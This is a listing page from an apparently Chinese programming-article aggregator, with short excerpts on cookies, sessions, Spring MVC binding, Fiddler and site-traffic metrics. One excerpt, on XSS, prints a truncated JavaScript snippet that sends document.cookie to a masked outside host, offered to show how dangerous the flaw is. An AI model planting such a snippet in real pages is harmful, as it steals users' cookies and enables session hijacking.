cookie
每次请求页面的时候进行验证,如果用户信息存储在数据库中,每次都要执行一次数据库查询,给数据库造成多余的负担。cookie可以被修改的,所以安全系数太低。session是存储在服务器端面的会话,相对安全,并且不像Cookie那样有存储长度限制。由于Session是以文本文件形式存储在服务...
分类:
Web程序 时间:
2014-05-24 00:53:52
阅读次数:
354
在系列(4)中我们介绍了如何用@RequestParam来绑定数据,下面我们来看一下其它几个数据绑定注解的使用方法。1.@PathVariable
用来绑定URL模板变量值,这个我们已经在系列(3)中介绍了使用方法,这里不在赘述。2.@CookieValue 用来绑定Cookie中的数据。下面我们用...
分类:
编程语言 时间:
2014-05-24 00:11:48
阅读次数:
437
SESSION的实现中采用COOKIE技术,SESSION会在客户端保存一个包含session_id(SESSION编号)的COOKIE;
在服务器端保存其他session变量,比如session_name等等。当用户请求服务器时也把session_id一起发送到服务器,通过
session_id提...
分类:
Web程序 时间:
2014-05-23 12:33:51
阅读次数:
437
今天上网学习的时候,突然发现有这么一个工具,叫Fiddler,百度方的解释为:Fiddler是一个http协议调试代理工具,它能够记录并检查所有你的电脑和互联网之间的http通讯,设置断点,查看所有的“进出”Fiddler的数据(指cookie,html,js,css等文件,这些都可以让你胡乱修改的...
分类:
其他好文 时间:
2014-05-23 12:28:06
阅读次数:
368
在PHP中使用过SESSION的朋友可能会碰到这么一个问题,SESSION变量不能跨页传递。这令我苦恼了好些日子,最终通过查资料思考并解决了这个问题。我认为,出现这个问题的原因有以下几点:
1、客户端禁用了cookie 2、浏览器出现问题,暂时无法存取cookie 3、php.ini中的sessi....
分类:
其他好文 时间:
2014-05-23 10:47:03
阅读次数:
426
xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。
如下js获取cookie信息:
url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src=’http://www.******.c...
分类:
其他好文 时间:
2014-05-22 08:24:14
阅读次数:
273
session
服务器用于缓存数据会话技术
默认情况:session依赖于cookie
对象HttpSession
1.session原理:
根据上图分析如下:
a.浏览器发送请求到服务器,并交给一个servlet进行处理。此时request.getSession()第一次创建session对象,将sessionId以cookie的方式发送给浏览器。同时在服务端会保存sessi...
分类:
编程语言 时间:
2014-05-22 08:08:44
阅读次数:
191
相信网站站长们在每天查看百度统计数据时会发现网站的IP和UV数据时大时小,有时候IP比UV大,有时候UV比IP大,站长们可能对这些情况感到奇怪。今天就和大家分享一下UV和IP的知识,帮助大家更好地做好网站流量分析工作。
一、Cookie、UV和IP的概念 要区别UV和IP,就要先说到Cook...
分类:
其他好文 时间:
2014-05-22 06:19:16
阅读次数:
444
项目名称:/cookieDemo2Record
需求:
模拟用户在网上商城,浏览商品,同时显示商品的浏览记录
1.查询所有商品页面-index.jsp/index.html
a.查询所有商品的按钮-----FindAllBooksServlet.java-com.ghsy.servlet
2.显示商城的商品
a.用bean存储商品-com.ghsy.domain
b.db包中的...
分类:
其他好文 时间:
2014-05-20 16:29:38
阅读次数:
311
web应用的会话技术:打开浏览器并访问网站,请求多个资源,关闭浏览器的过程。
在这个过程中,缓存用户数据常用的有两种技术:
1.cookie技术:用于在浏览器端,缓存用户的数据,可以理解为数据缓存在用户本地
2.session技术:用于在服务端,缓存用户的数据,可以理解为数据缓存在服务器。
cookie技术:
1.服务器需要缓存数据,将数据发给浏览器,浏览器对缓存数据进行存储;当浏览器再...
分类:
编程语言 时间:
2014-05-20 15:51:06
阅读次数:
289
